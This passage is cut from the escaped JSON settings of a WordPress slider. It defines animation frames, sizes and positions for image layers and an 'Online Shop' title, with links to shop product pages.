From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":900,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":900,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8090,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"5\":{\"text\":\"Image 5\",\"alias\":\"Image 5\",\"uid\":5,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/revslider\\/landing-brown-31.png\",\"imageId\":4600},\"size\":{\"width\":{\"d\":{\"v\":\"453px\",\"e\":true},\"n\":{\"v\":\"304px\",\"e\":true},\"t\":{\"v\":\"304px\"},\"m\":{\"v\":\"238px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"480px\",\"e\":true},\"n\":{\"v\":\"322px\",\"e\":true},\"t\":{\"v\":\"322px\"},\"m\":{\"v\":\"252px\",\"e\":true}},\"originalWidth\":453,\"originalHeight\":480,\"aspectRatio\":{\"d\":{\"v\":0.94374999999999997779553950749686919152736663818359375},\"n\":{\"v\":0.94374999999999997779553950749686919152736663818359375},\"t\":{\"v\":0.94374999999999997779553950749686919152736663818359375},\"m\":{\"v\":0.94374999999999997779553950749686919152736663818359375}}},\"position\":{\"x\":{\"d\":{\"v\":\"511px\",\"e\":true},\"n\":{\"v\":\"492px\",\"e\":true},\"t\":{\"v\":\"75px\",\"e\":true},\"m\":{\"v\":\"-7px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"322px\",\"e\":true},\"n\":{\"v\":\"348px\",\"e\":true},\"t\":{\"v\":\"-84px\",\"e\":true},\"m\":{\"v\":\"-41px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"right\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":8,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":8,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"bottom\"},\"n\":{\"v\":\"bottom\"},\"t\":{\"v\":\"bottom\"},\"m\":{\"v\":\"bottom\"}},\"z\":0,\"scaleX\":\"2\",\"scaleY\":\"2\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":\"90deg\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1500,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1500,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":7490,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false},\"type\":\"image\"},\"6\":{\"text\":\"Image 6\",\"alias\":\"Image 6\",\"uid\":6,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/revslider\\/landing-brown-21.jpg\",\"imageId\":4601},\"size\":{\"width\":{\"d\":{\"v\":\"678px\",\"e\":true},\"n\":{\"v\":\"553px\",\"e\":true},\"t\":{\"v\":\"451px\",\"e\":true},\"m\":{\"v\":\"294px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"433px\",\"e\":true},\"n\":{\"v\":\"353px\",\"e\":true},\"t\":{\"v\":\"288px\",\"e\":true},\"m\":{\"v\":\"187px\",\"e\":true}},\"originalWidth\":678,\"originalHeight\":433,\"aspectRatio\":{\"d\":{\"v\":1.565819861431870574364211279316805303096771240234375},\"n\":{\"v\":1.565819861431870574364211279316805303096771240234375},\"t\":{\"v\":1.565819861431870574364211279316805303096771240234375},\"m\":{\"v\":1.565819861431870574364211279316805303096771240234375}}},\"position\":{\"x\":{\"d\":{\"v\":\"147px\",\"e\":true},\"n\":{\"v\":\"147px\",\"e\":true},\"t\":{\"v\":\"103px\",\"e\":true},\"m\":{\"v\":\"17px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"101px\",\"e\":true},\"n\":{\"v\":\"106px\",\"e\":true},\"t\":{\"v\":\"159px\",\"e\":true},\"m\":{\"v\":\"112px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":9,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":9,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"50px\"},\"n\":{\"v\":\"50px\"},\"t\":{\"v\":\"50px\"},\"m\":{\"v\":\"50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":900,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":900,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8090,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"action\":[{\"tooltip_event\":\"click\",\"action\":\"link\",\"image_link\":\"http:\\/\\/succulents.select-themes.com\\/shop-list\\/\",\"link_open_in\":\"_blank\",\"link_follow\":\"follow\",\"jump_to_slide\":\"\",\"scrollunder_offset\":\"\",\"action_easing\":\"Linear.easeNone\",\"action_speed\":\"\",\"actioncallback\":\"\",\"layer_target\":\"backgroundvideo\",\"link_type\":\"a\",\"action_delay\":\"\",\"toggle_layer_type\":\"visible\",\"toggle_class\":\"\"}],\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"7\":{\"text\":\"Image 7\",\"alias\":\"Image 7\",\"uid\":7,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/revslider\\/sh-single-landing1.png\",\"imageId\":4602},\"size\":{\"width\":{\"d\":{\"v\":\"691px\",\"e\":true},\"n\":{\"v\":\"603px\",\"e\":true},\"t\":{\"v\":\"513px\",\"e\":true},\"m\":{\"v\":\"310px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"407px\",\"e\":true},\"n\":{\"v\":\"355px\",\"e\":true},\"t\":{\"v\":\"302px\",\"e\":true},\"m\":{\"v\":\"183px\",\"e\":true}},\"originalWidth\":717,\"originalHeight\":432,\"aspectRatio\":{\"d\":{\"v\":1.65972222222222232090871330001391470432281494140625},\"n\":{\"v\":1.65972222222222232090871330001391470432281494140625},\"t\":{\"v\":1.65972222222222232090871330001391470432281494140625},\"m\":{\"v\":1.65972222222222232090871330001391470432281494140625}}},\"position\":{\"x\":{\"d\":{\"v\":\"-178px\",\"e\":true},\"n\":{\"v\":\"-150px\",\"e\":true},\"t\":{\"v\":\"3px\",\"e\":true},\"m\":{\"v\":\"-13px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"40px\",\"e\":true},\"n\":{\"v\":\"54px\",\"e\":true},\"t\":{\"v\":\"14px\",\"e\":true},\"m\":{\"v\":\"-6px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":10,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":10,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":900,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":900,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8090,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"action\":[{\"tooltip_event\":\"click\",\"action\":\"link\",\"image_link\":\"http:\\/\\/succulents.select-themes.com\\/product\\/aero-aromathic\\/\",\"link_open_in\":\"_blank\",\"link_follow\":\"follow\",\"jump_to_slide\":\"\",\"scrollunder_offset\":\"\",\"action_easing\":\"Linear.easeNone\",\"action_speed\":\"\",\"actioncallback\":\"\",\"layer_target\":\"backgroundvideo\",\"link_type\":\"a\",\"action_delay\":\"\",\"toggle_layer_type\":\"visible\",\"toggle_class\":\"\"}],\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"3\":{\"text\":\"Online Shop\",\"alias\":\"Title\",\"uid\":3,\"size\":{\"width\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}},\"position\":{\"x\":{\"d\":{\"v\":\"2px\",\"e\":true},\"n\":{\"v\":\"4px\",\"e\":true},\"t\":{\"v\":\"5px\",\"e\":true},\"m\":{\"e\":true}},\"y\":{\"d\":{\"v\":\"-266px\",\"e\":true},\"n\":{\"v\":\"-225px\",\"e\":true},\"t\":{\"v\":\"200px\",\"e\":true},\"m\":{\"v\":\"83px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":11,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":11,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim 